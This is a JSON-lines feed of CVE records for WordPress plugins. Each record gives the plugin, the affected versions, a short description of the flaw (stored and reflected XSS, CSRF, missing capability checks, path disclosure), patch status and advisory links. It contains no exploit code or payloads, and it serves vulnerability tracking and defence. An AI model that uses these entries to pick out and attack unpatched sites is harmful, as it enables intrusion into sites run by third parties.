{"CVE_ID":"CVE-2024-10108","slug":"wpadverts","versionImpact":"2.1.6","description":"The WPAdverts \u2013 Classifieds Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's adverts_add shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b213c3b-3907-47d9-9826-379936f15078?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b213c3b-3907-47d9-9826-379936f15078?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadverts\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpadverts\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178088\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178088\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9851","slug":"tour-operator","versionImpact":"1.4.9","description":"The LSX Tour Operator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tour-operator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tour-operator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ef71da-50f2-4f7e-8a23-23adbabee09d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ef71da-50f2-4f7e-8a23-23adbabee09d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1508","slug":"wp-crowdfunding","versionImpact":"2.1.13","description":"The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the download_data action in all versions up to, and including, 2.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to download all of a site's post content when WooCommerce is installed.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70a93afa-9801-41d2-8923-ca4ae6ae974f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70a93afa-9801-41d2-8923-ca4ae6ae974f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31776","slug":"uptime-robot-monitor","versionImpact":"2.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Aphotrax Uptime Robot Plugin for WordPress allows Cross Site Request Forgery. This issue affects Uptime Robot Plugin for WordPress: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-2-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3858","slug":"formality","versionImpact":"1.5.8","description":"The Formality plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 parameter in all versions up to, and including, 1.5.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formality\\\/trunk\\\/public\\\/class-formality-form.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formality\\\/trunk\\\/public\\\/class-formality-form.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285036\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285036\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formality\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formality\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e25157d3-42ac-4dd6-a736-5623a16e5629?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e25157d3-42ac-4dd6-a736-5623a16e5629?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12725","slug":"clasify-classified-listing","versionImpact":"1.0.7","description":"The Clasify Classified Listing WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a174c640-6994-4028-a8a3-c470d5612304\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a174c640-6994-4028-a8a3-c470d5612304\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4355","slug":"usc-e-shop","versionImpact":"2.2.7","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the download_orderdetail_list(), change_orderlist(), and download_member_list() functions called via admin_init hooks in versions up to, and including, 2.2.7. This makes it possible for unauthenticated attackers to download lists of members, products and orders.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-welcart-e-commerce-plugin-fixed-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/671f5ba5-1f18-49fa-aa97-eaebdb3417bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/671f5ba5-1f18-49fa-aa97-eaebdb3417bb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36748","slug":"dokan-lite","versionImpact":"3.0.8","description":"The Dokan plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.0.8. This is due to missing or incorrect nonce validation on the handle_order_export() function. This makes it possible for unauthenticated attackers to trigger an order export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894c875a-078f-4c1f-83d2-4a6e4a309c3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/894c875a-078f-4c1f-83d2-4a6e4a309c3e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368433\\\/dokan-lite\\\/trunk\\\/includes\\\/Dashboard\\\/Templates\\\/Orders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368433\\\/dokan-lite\\\/trunk\\\/includes\\\/Dashboard\\\/Templates\\\/Orders.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34023","slug":"wordpress-social-login","versionImpact":"3.0.4","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Miled WordPress Social Login plugin <=\u00a03.0.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability-2?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6573","slug":"intelligence","versionImpact":"1.4.0","description":"The Intelligence plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.4.0. This is due to the plugin not preventing direct access to the \/vendor\/levelten\/intel\/realtime\/index.php file and display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5aa0222-1e70-4c06-860f-77643da4356c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5aa0222-1e70-4c06-860f-77643da4356c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/settings.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intelligence\\\/trunk\\\/vendor\\\/levelten\\\/intel\\\/realtime\\\/settings.php#L12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7426","slug":"peepso-core","versionImpact":"6.4.6.0","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 6.4.6.0. This is due to the plugin displaying errors and allowing direct access to the sse.php file. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e69d666-50de-4c82-9ad4-9ed40fcc7218?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e69d666-50de-4c82-9ad4-9ed40fcc7218?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1410","slug":"pie-calendar","versionImpact":"1.2.5","description":"The Events Calendar Made Simple \u2013 Pie Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's piecal shortcode in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243992\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243992\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-calendar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-calendar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaea2fb-ebf8-49b4-8cd5-0d9208252a90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaea2fb-ebf8-49b4-8cd5-0d9208252a90?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31735","slug":"footnotes-for-wordpress","versionImpact":"2016.1230","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in C. Johnson Footnotes for WordPress allows Stored XSS. This issue affects Footnotes for WordPress: from n\/a through 2016.1230.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/footnotes-for-wordpress\\\/vulnerability\\\/wordpress-footnotes-for-wordpress-plugin-2016-1230-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/footnotes-for-wordpress\\\/vulnerability\\\/wordpress-footnotes-for-wordpress-plugin-2016-1230-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3748","slug":"taxonomy-chain-menu","versionImpact":"1.0.8","description":"The Taxonomy Chain Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's pn_chain_menu shortcode in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taxonomy-chain-menu\\\/trunk\\\/index.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/taxonomy-chain-menu\\\/trunk\\\/index.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284354\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3284354\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taxonomy-chain-menu\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/taxonomy-chain-menu\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25afc28c-2814-4b49-add5-1d0ce5ff3a07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25afc28c-2814-4b49-add5-1d0ce5ff3a07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12724","slug":"wp-desklite","versionImpact":"1.0.0","description":"The WP DeskLite WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7667","slug":"restrict-file-access","versionImpact":"1.1.2","description":"The Restrict File Access plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the 'restrict-file-access' page. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php), via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/admin\\\/admin.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/admin\\\/admin.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1105717-134b-48cc-960d-f78437c06793?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1105717-134b-48cc-960d-f78437c06793?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36747","slug":"sidebar-manager","versionImpact":"1.1.4","description":"The Lightweight Sidebar Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the metabox_save() function. This makes it possible for unauthenticated attackers to save metabox data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368387%40sidebar-manager&new=2368387%40sidebar-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368387%40sidebar-manager&new=2368387%40sidebar-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844c5012-f823-46ae-8de2-e2803b7cd063?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844c5012-f823-46ae-8de2-e2803b7cd063?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1982","slug":"front-editor","versionImpact":"4.0.4","description":"The Front Editor WordPress plugin through 4.0.4 does not sanitize and escape some of its form settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/51987966-8007-4e12-bc2e-997b92054739\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/51987966-8007-4e12-bc2e-997b92054739\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2253","slug":"testimonials-carousel-elementor","versionImpact":"10.2.2","description":"The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URL values in the plugin's carousel widgets in all versions up to, and including, 10.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d559b862-ee07-4207-8c64-81961516a046?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d559b862-ee07-4207-8c64-81961516a046?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-employees.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-employees.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6566","slug":"aramex-shipping-woocommerce","versionImpact":"1.1.21","description":"The Aramex Shipping WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.1.21. This is due to the plugin not preventing direct access to the composer-setup.php file which also has display_errors enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd71c-3d08-4767-b471-a1d5a17fe6ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd71c-3d08-4767-b471-a1d5a17fe6ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aramex-shipping-woocommerce\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aramex-shipping-woocommerce\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9702","slug":"social-rocket","versionImpact":"1.3.4","description":"The Social Rocket \u2013 Social Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialrocket-floating' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-rocket\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-rocket\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d4d948e-359e-4514-9c8f-dbd8198ef4fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d4d948e-359e-4514-9c8f-dbd8198ef4fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28914","slug":"wp-show-login-form","versionImpact":"0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ajay Sharma wordpress login form to anywhere allows Stored XSS. This issue affects wordpress login form to anywhere: from n\/a through 0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-show-login-form\\\/vulnerability\\\/wordpress-wordpress-login-form-to-anywhere-plugin-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-show-login-form\\\/vulnerability\\\/wordpress-wordpress-login-form-to-anywhere-plugin-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
